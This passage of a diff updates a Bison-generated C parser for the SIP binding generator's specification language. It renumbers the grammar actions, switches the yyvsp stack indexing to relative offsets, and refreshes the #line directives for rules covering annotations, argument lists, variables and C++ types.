3999 "parser.y" ++ { + apiVersionRangeDef *avd; + int from, to; + + (yyval.flag).ftype = api_range_flag; + + /* Check that the API is known. */ +- if ((avd = findAPI(currentSpec, (yyvsp[(1) - (5)].text))) == NULL) ++ if ((avd = findAPI(currentSpec, (yyvsp[-4].text))) == NULL) + yyerror("unknown API name in API annotation"); + + if (inMainModule()) + setIsUsedName(avd->api_name); + + /* Unbounded values are represented by 0. */ +- if ((from = (yyvsp[(3) - (5)].number)) < 0) ++ if ((from = (yyvsp[-2].number)) < 0) + from = 0; + +- if ((to = (yyvsp[(5) - (5)].number)) < 0) ++ if ((to = (yyvsp[0].number)) < 0) + to = 0; + + (yyval.flag).fvalue.aval = convertAPIRange(currentModule, avd->api_name, + from, to); + } ++#line 7366 "../parser.c" + break; + +- case 506: +-#line 3996 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 507: /* flagvalue: TK_STRING_VALUE */ ++#line 4022 "parser.y" ++ { + (yyval.flag).ftype = string_flag; +- (yyval.flag).fvalue.sval = convertFeaturedString((yyvsp[(1) - (1)].text)); ++ (yyval.flag).fvalue.sval = convertFeaturedString((yyvsp[0].text)); + } ++#line 7375 "../parser.c" + break; + +- case 507: +-#line 4000 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 508: /* flagvalue: TK_NUMBER_VALUE */ ++#line 4026 "parser.y" ++ { + (yyval.flag).ftype = integer_flag; +- (yyval.flag).fvalue.ival = (yyvsp[(1) - (1)].number); ++ (yyval.flag).fvalue.ival = (yyvsp[0].number); + } ++#line 7384 "../parser.c" + break; + +- case 508: +-#line 4006 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 509: /* virtualcallcode: %empty */ ++#line 4032 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7392 "../parser.c" + break; + +- case 509: +-#line 4009 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 510: /* virtualcallcode: TK_VIRTUALCALLCODE codeblock */ ++#line 4035 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7400 "../parser.c" + break; + +- case 510: +-#line 4014 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 511: /* methodcode: %empty */ ++#line 4040 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7408 "../parser.c" + break; + +- case 511: +-#line 4017 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 512: /* methodcode: TK_METHODCODE codeblock */ ++#line 4043 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7416 "../parser.c" + break; + +- case 512: +-#line 4022 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 513: /* premethodcode: %empty */ ++#line 4048 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7424 "../parser.c" + break; + +- case 513: +-#line 4025 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 514: /* premethodcode: TK_PREMETHODCODE codeblock */ ++#line 4051 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7432 "../parser.c" + break; + +- case 514: +-#line 4030 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 515: /* virtualcatchercode: %empty */ ++#line 4056 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7440 "../parser.c" + break; + +- case 515: +-#line 4033 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 516: /* virtualcatchercode: TK_VIRTUALCATCHERCODE codeblock */ ++#line 4059 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7448 "../parser.c" + break; + +- case 516: +-#line 4038 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 517: /* arglist: rawarglist */ ++#line 4064 "parser.y" ++ { + int a, nrrxcon, nrrxdis, nrslotcon, nrslotdis, nrarray, nrarraysize; + + nrrxcon = nrrxdis = nrslotcon = nrslotdis = nrarray = nrarraysize = 0; + +- for (a = 0; a < (yyvsp[(1) - (1)].signature).nrArgs; ++a) ++ for (a = 0; a < (yyvsp[0].signature).nrArgs; ++a) + { +- argDef *ad = &(yyvsp[(1) - (1)].signature).args[a]; ++ argDef *ad = &(yyvsp[0].signature).args[a]; + + switch (ad -> atype) + { +@@ -7497,226 +7497,243 @@ yyreduce: + if (nrarray != nrarraysize || nrarray > 1) + yyerror("/Array/ and /ArraySize/ must both be given and at most once"); + +- (yyval.signature) = (yyvsp[(1) - (1)].signature); ++ (yyval.signature) = (yyvsp[0].signature); + } ++#line 7503 "../parser.c" + break; + +- case 517: +-#line 4090 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 518: /* rawarglist: %empty */ ++#line 4116 "parser.y" ++ { + /* No arguments. */ + + (yyval.signature).nrArgs = 0; + } ++#line 7513 "../parser.c" + break; + +- case 518: +-#line 4095 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 519: /* rawarglist: argvalue */ ++#line 4121 "parser.y" ++ { + /* The single or first argument. */ + +- (yyval.signature).args[0] = (yyvsp[(1) - (1)].memArg); ++ (yyval.signature).args[0] = (yyvsp[0].memArg); + (yyval.signature).nrArgs = 1; + } ++#line 7524 "../parser.c" + break; + +- case 519: +-#line 4101 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 520: /* rawarglist: rawarglist ',' argvalue */ ++#line 4127 "parser.y" ++ { + /* Check that it wasn't ...(,arg...). */ +- if ((yyvsp[(1) - (3)].signature).nrArgs == 0) ++ if ((yyvsp[-2].signature).nrArgs == 0) + yyerror("First argument of the list is missing"); + + /* + * If this argument has no default value, then the + * previous one mustn't either. + */ +- if ((yyvsp[(3) - (3)].memArg).defval == NULL && (yyvsp[(1) - (3)].signature).args[(yyvsp[(1) - (3)].signature).nrArgs - 1].defval != NULL) ++ if ((yyvsp[0].memArg).defval == NULL && (yyvsp[-2].signature).args[(yyvsp[-2].signature).nrArgs - 1].defval != NULL) + yyerror("Compulsory argument given after optional argument"); + + /* Check there is room. */ +- if ((yyvsp[(1) - (3)].signature).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].signature).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.signature) = (yyvsp[(1) - (3)].signature); ++ (yyval.signature) = (yyvsp[-2].signature); + +- (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[(3) - (3)].memArg); ++ (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[0].memArg); + (yyval.signature).nrArgs++; + } ++#line 7550 "../parser.c" + break; + +- case 520: +-#line 4124 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 521: /* argvalue: TK_SIPSIGNAL optname optflags optassign */ ++#line 4150 "parser.y" ++ { + deprecated("SIP_SIGNAL is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (4)].optflags), "SIP_SIGNAL has no annotations"); ++ checkNoAnnos(&(yyvsp[-1].optflags), "SIP_SIGNAL has no annotations"); + + (yyval.memArg).atype = signal_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (4)].text)); +- (yyval.memArg).defval = (yyvsp[(4) - (4)].valp); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-2].text)); ++ (yyval.memArg).defval = (yyvsp[0].valp); + + currentSpec -> sigslots = TRUE; + } ++#line 7567 "../parser.c" + break; + +- case 521: +-#line 4136 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 522: /* argvalue: TK_SIPSLOT optname optflags optassign */ ++#line 4162 "parser.y" ++ { + deprecated("SIP_SLOT is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (4)].optflags), "SIP_SLOT has no annotations"); ++ checkNoAnnos(&(yyvsp[-1].optflags), "SIP_SLOT has no annotations"); + + (yyval.memArg).atype = slot_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (4)].text)); +- (yyval.memArg).defval = (yyvsp[(4) - (4)].valp); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-2].text)); ++ (yyval.memArg).defval = (yyvsp[0].valp); + + currentSpec -> sigslots = TRUE; + } ++#line 7584 "../parser.c" + break; + +- case 522: +-#line 4148 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 523: /* argvalue: TK_SIPANYSLOT optname optflags optassign */ ++#line 4174 "parser.y" ++ { + deprecated("SIP_ANYSLOT is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (4)].optflags), "SIP_ANYSLOT has no annotations"); ++ checkNoAnnos(&(yyvsp[-1].optflags), "SIP_ANYSLOT has no annotations"); + + (yyval.memArg).atype = anyslot_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (4)].text)); +- (yyval.memArg).defval = (yyvsp[(4) - (4)].valp); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-2].text)); ++ (yyval.memArg).defval = (yyvsp[0].valp); + + currentSpec -> sigslots = TRUE; + } ++#line 7601 "../parser.c" + break; + +- case 523: +-#line 4160 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 524: /* argvalue: TK_SIPRXCON optname optflags */ ++#line 4186 "parser.y" ++ { + const char *annos[] = { + "SingleShot", + NULL + }; + + deprecated("SIP_RXOBJ_CON is deprecated\n"); +- checkAnnos(&(yyvsp[(3) - (3)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + (yyval.memArg).atype = rxcon_type; + (yyval.memArg).argflags = 0; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags), "SingleShot", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags), "SingleShot", bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_SINGLE_SHOT; + + currentSpec -> sigslots = TRUE; + } ++#line 7625 "../parser.c" + break; + +- case 524: +-#line 4179 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 525: /* argvalue: TK_SIPRXDIS optname optflags */ ++#line 4205 "parser.y" ++ { + deprecated("SIP_RXOBJ_DIS is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (3)].optflags), "SIP_RXOBJ_DIS has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_RXOBJ_DIS has no annotations"); + + (yyval.memArg).atype = rxdis_type; + (yyval.memArg).argflags = 0; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + + currentSpec -> sigslots = TRUE; + } ++#line 7641 "../parser.c" + break; + +- case 525: +-#line 4190 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 526: /* argvalue: TK_SIPSLOTCON '(' arglist ')' optname optflags */ ++#line 4216 "parser.y" ++ { + deprecated("SIP_SLOT_CON is deprecated\n"); +- checkNoAnnos(&(yyvsp[(6) - (6)].optflags), "SIP_SLOT_CON has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_SLOT_CON has no annotations"); + + (yyval.memArg).atype = slotcon_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(5) - (6)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- memset(&(yyvsp[(3) - (6)].signature).result, 0, sizeof (argDef)); +- (yyvsp[(3) - (6)].signature).result.atype = void_type; ++ memset(&(yyvsp[-3].signature).result, 0, sizeof (argDef)); ++ (yyvsp[-3].signature).result.atype = void_type; + + (yyval.memArg).u.sa = sipMalloc(sizeof (signatureDef)); +- *(yyval.memArg).u.sa = (yyvsp[(3) - (6)].signature); ++ *(yyval.memArg).u.sa = (yyvsp[-3].signature); + + currentSpec -> sigslots = TRUE; + } ++#line 7663 "../parser.c" + break; + +- case 526: +-#line 4207 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 527: /* argvalue: TK_SIPSLOTDIS '(' arglist ')' optname optflags */ ++#line 4233 "parser.y" ++ { + deprecated("SIP_SLOT_DIS is deprecated\n"); +- checkNoAnnos(&(yyvsp[(6) - (6)].optflags), "SIP_SLOT_DIS has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_SLOT_DIS has no annotations"); + + (yyval.memArg).atype = slotdis_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(5) - (6)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- memset(&(yyvsp[(3) - (6)].signature).result, 0, sizeof (argDef)); +- (yyvsp[(3) - (6)].signature).result.atype = void_type; ++ memset(&(yyvsp[-3].signature).result, 0, sizeof (argDef)); ++ (yyvsp[-3].signature).result.atype = void_type; + + (yyval.memArg).u.sa = sipMalloc(sizeof (signatureDef)); +- *(yyval.memArg).u.sa = (yyvsp[(3) - (6)].signature); ++ *(yyval.memArg).u.sa = (yyvsp[-3].signature); + + currentSpec -> sigslots = TRUE; + } ++#line 7685 "../parser.c" + break; + +- case 527: +-#line 4224 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 528: /* argvalue: TK_QOBJECT optname optflags */ ++#line 4250 "parser.y" ++ { + deprecated("SIP_QOBJECT is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (3)].optflags), "SIP_QOBJECT has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_QOBJECT has no annotations"); + + (yyval.memArg).atype = qobject_type; + (yyval.memArg).argflags = 0; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + } ++#line 7699 "../parser.c" + break; + +- case 528: +-#line 4233 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.memArg) = (yyvsp[(1) - (2)].memArg); +- (yyval.memArg).defval = (yyvsp[(2) - (2)].valp); ++ case 529: /* argvalue: argtype optassign */ ++#line 4259 "parser.y" ++ { ++ (yyval.memArg) = (yyvsp[-1].memArg); ++ (yyval.memArg).defval = (yyvsp[0].valp); + } ++#line 7708 "../parser.c" + break; + +- case 529: +-#line 4240 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsSignal = TRUE;} ++ case 530: /* $@19: %empty */ ++#line 4266 "parser.y" ++ {currentIsSignal = TRUE;} ++#line 7714 "../parser.c" + break; + +- case 531: +-#line 4241 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsSlot = TRUE;} ++ case 532: /* $@20: %empty */ ++#line 4267 "parser.y" ++ {currentIsSlot = TRUE;} ++#line 7720 "../parser.c" + break; + +- case 534: +-#line 4246 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsStatic = TRUE;} ++ case 535: /* $@21: %empty */ ++#line 4272 "parser.y" ++ {currentIsStatic = TRUE;} ++#line 7726 "../parser.c" + break; + +- case 539: +-#line 4256 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsVirt = TRUE;} ++ case 540: /* $@22: %empty */ ++#line 4282 "parser.y" ++ {currentIsVirt = TRUE;} ++#line 7732 "../parser.c" + break; + +- case 542: +-#line 4260 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 543: /* variable: cpptype TK_NAME_VALUE optflags variable_body ';' optaccesscode optgetcode optsetcode */ ++#line 4286 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -7730,99 +7747,105 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(3) - (8)].optflags), annos); ++ checkAnnos(&(yyvsp[-5].optflags), annos); + +- if ((yyvsp[(6) - (8)].codeb) != NULL) ++ if ((yyvsp[-2].codeb) != NULL) + { +- if ((yyvsp[(4) - (8)].variable).access_code != NULL) ++ if ((yyvsp[-4].variable).access_code != NULL) + yyerror("%AccessCode already defined"); + +- (yyvsp[(4) - (8)].variable).access_code = (yyvsp[(6) - (8)].codeb); ++ (yyvsp[-4].variable).access_code = (yyvsp[-2].codeb); + + deprecated("%AccessCode should be used as a sub-directive"); + } + +- if ((yyvsp[(7) - (8)].codeb) != NULL) ++ if ((yyvsp[-1].codeb) != NULL) + { +- if ((yyvsp[(4) - (8)].variable).get_code != NULL) ++ if ((yyvsp[-4].variable).get_code != NULL) + yyerror("%GetCode already defined"); + +- (yyvsp[(4) - (8)].variable).get_code = (yyvsp[(7) - (8)].codeb); ++ (yyvsp[-4].variable).get_code = (yyvsp[-1].codeb); + + deprecated("%GetCode should be used as a sub-directive"); + } + +- if ((yyvsp[(8) - (8)].codeb) != NULL) ++ if ((yyvsp[0].codeb) != NULL) + { +- if ((yyvsp[(4) - (8)].variable).set_code != NULL) ++ if ((yyvsp[-4].variable).set_code != NULL) + yyerror("%SetCode already defined"); + +- (yyvsp[(4) - (8)].variable).set_code = (yyvsp[(8) - (8)].codeb); ++ (yyvsp[-4].variable).set_code = (yyvsp[0].codeb); + + deprecated("%SetCode should be used as a sub-directive"); + } + +- newVar(currentSpec, currentModule, (yyvsp[(2) - (8)].text), currentIsStatic, &(yyvsp[(1) - (8)].memArg), +- &(yyvsp[(3) - (8)].optflags), (yyvsp[(4) - (8)].variable).access_code, (yyvsp[(4) - (8)].variable).get_code, (yyvsp[(4) - (8)].variable).set_code, ++ newVar(currentSpec, currentModule, (yyvsp[-6].text), currentIsStatic, &(yyvsp[-7].memArg), ++ &(yyvsp[-5].optflags), (yyvsp[-4].variable).access_code, (yyvsp[-4].variable).get_code, (yyvsp[-4].variable).set_code, + sectionFlags); + } + + currentIsStatic = FALSE; + } ++#line 7790 "../parser.c" + break; + +- case 543: +-#line 4315 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 544: /* variable_body: %empty */ ++#line 4341 "parser.y" ++ { + (yyval.variable).token = 0; + (yyval.variable).access_code = NULL; + (yyval.variable).get_code = NULL; + (yyval.variable).set_code = NULL; + } ++#line 7801 "../parser.c" + break; + +- case 544: +-#line 4321 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.variable) = (yyvsp[(2) - (3)].variable); ++ case 545: /* variable_body: '{' variable_body_directives '}' */ ++#line 4347 "parser.y" ++ { ++ (yyval.variable) = (yyvsp[-1].variable); + } ++#line 7809 "../parser.c" + break; + +- case 546: +-#line 4327 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.variable) = (yyvsp[(1) - (2)].variable); ++ case 547: /* variable_body_directives: variable_body_directives variable_body_directive */ ++#line 4353 "parser.y" ++ { ++ (yyval.variable) = (yyvsp[-1].variable); + +- switch ((yyvsp[(2) - (2)].variable).token) ++ switch ((yyvsp[0].variable).token) + { +- case TK_ACCESSCODE: (yyval.variable).access_code = (yyvsp[(2) - (2)].variable).access_code; break; +- case TK_GETCODE: (yyval.variable).get_code = (yyvsp[(2) - (2)].variable).get_code; break; +- case TK_SETCODE: (yyval.variable).set_code = (yyvsp[(2) - (2)].variable).set_code; break; ++ case TK_ACCESSCODE: (yyval.variable).access_code = (yyvsp[0].variable).access_code; break; ++ case TK_GETCODE: (yyval.variable).get_code = (yyvsp[0].variable).get_code; break; ++ case TK_SETCODE: (yyval.variable).set_code = (yyvsp[0].variable).set_code; break; + } + } ++#line 7824 "../parser.c" + break; + +- case 547: +-#line 4339 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 548: /* variable_body_directive: ifstart */ ++#line 4365 "parser.y" ++ { + (yyval.variable).token = TK_IF; + } ++#line 7832 "../parser.c" + break; + +- case 548: +-#line 4342 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 549: /* variable_body_directive: ifend */ ++#line 4368 "parser.y" ++ { + (yyval.variable).token = TK_END; + } ++#line 7840 "../parser.c" + break; + +- case 549: +-#line 4345 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 550: /* variable_body_directive: TK_ACCESSCODE codeblock */ ++#line 4371 "parser.y" ++ { + if (notSkipping()) + { + (yyval.variable).token = TK_ACCESSCODE; +- (yyval.variable).access_code = (yyvsp[(2) - (2)].codeb); ++ (yyval.variable).access_code = (yyvsp[0].codeb); + } + else + { +@@ -7833,15 +7856,16 @@ yyreduce: + (yyval.variable).get_code = NULL; + (yyval.variable).set_code = NULL; + } ++#line 7860 "../parser.c" + break; + +- case 550: +-#line 4360 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 551: /* variable_body_directive: TK_GETCODE codeblock */ ++#line 4386 "parser.y" ++ { + if (notSkipping()) + { + (yyval.variable).token = TK_GETCODE; +- (yyval.variable).get_code = (yyvsp[(2) - (2)].codeb); ++ (yyval.variable).get_code = (yyvsp[0].codeb); + } + else + { +@@ -7852,15 +7876,16 @@ yyreduce: + (yyval.variable).access_code = NULL; + (yyval.variable).set_code = NULL; + } ++#line 7880 "../parser.c" + break; + +- case 551: +-#line 4375 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 552: /* variable_body_directive: TK_SETCODE codeblock */ ++#line 4401 "parser.y" ++ { + if (notSkipping()) + { + (yyval.variable).token = TK_SETCODE; +- (yyval.variable).set_code = (yyvsp[(2) - (2)].codeb); ++ (yyval.variable).set_code = (yyvsp[0].codeb); + } + else + { +@@ -7871,36 +7896,39 @@ yyreduce: + (yyval.variable).access_code = NULL; + (yyval.variable).get_code = NULL; + } ++#line 7900 "../parser.c" + break; + +- case 552: +-#line 4392 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.memArg) = (yyvsp[(2) - (4)].memArg); +- add_derefs(&(yyval.memArg), &(yyvsp[(3) - (4)].memArg)); +- (yyval.memArg).argflags |= ARG_IS_CONST | (yyvsp[(4) - (4)].number); ++ case 553: /* cpptype: TK_CONST basetype deref optref */ ++#line 4418 "parser.y" ++ { ++ (yyval.memArg) = (yyvsp[-2].memArg); ++ add_derefs(&(yyval.memArg), &(yyvsp[-1].memArg)); ++ (yyval.memArg).argflags |= ARG_IS_CONST | (yyvsp[0].number); + } ++#line 7910 "../parser.c" + break; + +- case 553: +-#line 4397 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.memArg) = (yyvsp[(1) - (3)].memArg); +- add_derefs(&(yyval.memArg), &(yyvsp[(2) - (3)].memArg)); +- (yyval.memArg).argflags |= (yyvsp[(3) - (3)].number); ++ case 554: /* cpptype: basetype deref optref */ ++#line 4423 "parser.y" ++ { ++ (yyval.memArg) = (yyvsp[-2].memArg); ++ add_derefs(&(yyval.memArg), &(yyvsp[-1].memArg)); ++ (yyval.memArg).argflags |= (yyvsp[0].number); + + /* PyObject * is a synonym for SIP_PYOBJECT. */ +- if ((yyvsp[(1) - (3)].memArg).atype == defined_type && strcmp((yyvsp[(1) - (3)].memArg).u.snd->name, "PyObject") == 0 && (yyvsp[(1) - (3)].memArg).u.snd->next == NULL && (yyvsp[(2) - (3)].memArg).nrderefs == 1 && (yyvsp[(3) - (3)].number) == 0) ++ if ((yyvsp[-2].memArg).atype == defined_type && strcmp((yyvsp[-2].memArg).u.snd->name, "PyObject") == 0 && (yyvsp[-2].memArg).u.snd->next == NULL && (yyvsp[-1].memArg).nrderefs == 1 && (yyvsp[0].number) == 0) + { + (yyval.memArg).atype = pyobject_type; + (yyval.memArg).nrderefs = 0; + } + } ++#line 7927 "../parser.c" + break; + +- case 554: +-#line 4411 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 555: /* argtype: cpptype optname optflags */ ++#line 4437 "parser.y" ++ { + const char *annos[] = { + "AllowNone", + "Array", +@@ -7930,54 +7958,54 @@ yyreduce: + + optFlag *of; + +- checkAnnos(&(yyvsp[(3) - (3)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + +- (yyval.memArg) = (yyvsp[(1) - (3)].memArg); +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg) = (yyvsp[-2].memArg); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- handleKeepReference(&(yyvsp[(3) - (3)].optflags), &(yyval.memArg), currentModule); ++ handleKeepReference(&(yyvsp[0].optflags), &(yyval.memArg), currentModule); + +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "ScopesStripped", opt_integer_flag)) != NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "ScopesStripped", opt_integer_flag)) != NULL) + if (((yyval.memArg).scopes_stripped = of->fvalue.ival) <= 0) + yyerror("/ScopesStripped/ must be greater than 0"); + +- if (getAllowNone(&(yyvsp[(3) - (3)].optflags))) ++ if (getAllowNone(&(yyvsp[0].optflags))) + (yyval.memArg).argflags |= ARG_ALLOW_NONE; + +- if (getDisallowNone(&(yyvsp[(3) - (3)].optflags))) ++ if (getDisallowNone(&(yyvsp[0].optflags))) + (yyval.memArg).argflags |= ARG_DISALLOW_NONE; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"GetWrapper",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"GetWrapper",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_GET_WRAPPER; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"Array",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"Array",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_ARRAY; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"ArraySize",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"ArraySize",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_ARRAY_SIZE; + +- if (getTransfer(&(yyvsp[(3) - (3)].optflags))) ++ if (getTransfer(&(yyvsp[0].optflags))) + (yyval.memArg).argflags |= ARG_XFERRED; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"TransferThis",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"TransferThis",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_THIS_XFERRED; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"TransferBack",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"TransferBack",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_XFERRED_BACK; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"In",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"In",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_IN; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"Out",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"Out",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_OUT; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags), "ResultSize", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags), "ResultSize", bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_RESULT_SIZE; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags), "NoCopy", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags), "NoCopy", bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_NO_COPY; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"Constrained",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"Constrained",bool_flag) != NULL) + { + (yyval.memArg).argflags |= ARG_CONSTRAINED; + +@@ -8005,499 +8033,518 @@ yyreduce: + } + } + +- applyTypeFlags(currentModule, &(yyval.memArg), &(yyvsp[(3) - (3)].optflags)); +- (yyval.memArg).typehint_value = getTypeHintValue(&(yyvsp[(3) - (3)].optflags)); ++ applyTypeFlags(currentModule, &(yyval.memArg), &(yyvsp[0].optflags)); ++ (yyval.memArg).typehint_value = getTypeHintValue(&(yyvsp[0].optflags)); + } ++#line 8040 "../parser.c" + break; + +- case 555: +-#line 4521 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 556: /* optref: %empty */ ++#line 4547 "parser.y" ++ { + (yyval.number) = 0; + } ++#line 8048 "../parser.c" + break; + +- case 556: +-#line 4524 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 557: /* optref: '&' */ ++#line 4550 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("References not allowed in a C module"); + + (yyval.number) = ARG_IS_REF; + } ++#line 8059 "../parser.c" + break; + +- case 557: +-#line 4532 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 558: /* deref: %empty */ ++#line 4558 "parser.y" ++ { + (yyval.memArg).nrderefs = 0; + } ++#line 8067 "../parser.c" + break; + +- case 558: +-#line 4535 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- add_new_deref(&(yyval.memArg), &(yyvsp[(1) - (3)].memArg), TRUE); ++ case 559: /* deref: deref '*' TK_CONST */ ++#line 4561 "parser.y" ++ { ++ add_new_deref(&(yyval.memArg), 